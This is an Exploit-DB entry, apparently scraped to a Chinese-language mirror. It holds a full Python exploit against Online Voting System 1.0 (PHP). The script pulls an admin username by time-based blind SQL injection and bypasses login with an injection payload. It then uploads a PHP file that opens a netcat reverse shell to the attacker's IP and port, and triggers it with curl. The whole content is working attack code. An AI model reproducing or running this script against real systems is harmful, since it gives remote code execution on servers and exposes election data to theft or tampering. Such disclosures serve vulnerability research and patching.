Online Voting System 1.0 – SQLi (Authentication Bypass) + Remote Code Execution (RCE)

Exploit Database
111 阅读

作者： Geiseric

日期： 2021-07-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50088/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)

# Exploit Author: Geiseric

# Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075

# Date 02.07.2021

# Vendor Homepage: https://www.sourcecodester.com/

# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html

# Version 1.0

# Tested on: Ubuntu 20.04

import requests

import os

import sys

from requests_toolbelt.multipart.encoder import MultipartEncoder

import string

import random

if len(sys.argv) < 4:

print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>')

exit()

url = sys.argv[1]

attacker_ip = sys.argv[2]

attacker_port = sys.argv[3]

exp_url = '/Online_voting_system/admin/save_candidate.php'

login_url = '/Online_voting_system/admin/'

def first_get():

r = requests.get(url+login_url)

return r.headers['Set-Cookie']

def retrieve_first_admin():

print("[!] Stage 1: Finding a valid admin user through SQL Injection")

cookie = first_get()

count = 0

i=1

flag = True

admin = ''

while flag:

for j in range(32,128):

r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie})

if (r.elapsed.total_seconds() > 1):

admin += chr(j)

i+=1

sys.stdout.write("\rAdmin User: "+ admin)

sys.stdout.flush()

count=0

else:

if count == 100:

flag = False

break

else:

count += 1

print("\n[+] First admin user found!")

print("[!] Starting Stage 2")

return admin

def id_generator(size=6, chars=string.ascii_lowercase):

return ''.join(random.choice(chars) for _ in range(size))+'.php'

def login_bypass(cookie):

username = retrieve_first_admin()

print("[!] Stage 2 started: Bypassing Login...")

r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie})

return cookie

def rev_write():

name = id_generator()

f = open(name,'w')

f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>')

f.close()

print('[+] Generated file with reverse shell: ' +name)

return name

def exploit(cookie):

print("[+] Uploading reverse shell...")

filename=rev_write()

multipart_data = MultipartEncoder(

{

# a file upload field

'image': (filename, open(filename, 'rb'), 'application/x-php'),

# plain text fields

'user_name': 'admin',

'rfirstname': 'test',

'rlastname': 'test',

'rgender': 'Male',

'ryear': '1st year',

'rmname': 'test',

'rposition': 'Governor',

'party': 'test',

'save': 'save'

}

)

r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie})

return filename

filename = exploit(login_bypass(first_get()))

print("[!] Triggering...")

input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.')

os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s')

print("[+] Cleaning up!")

os.system("rm "+ filename)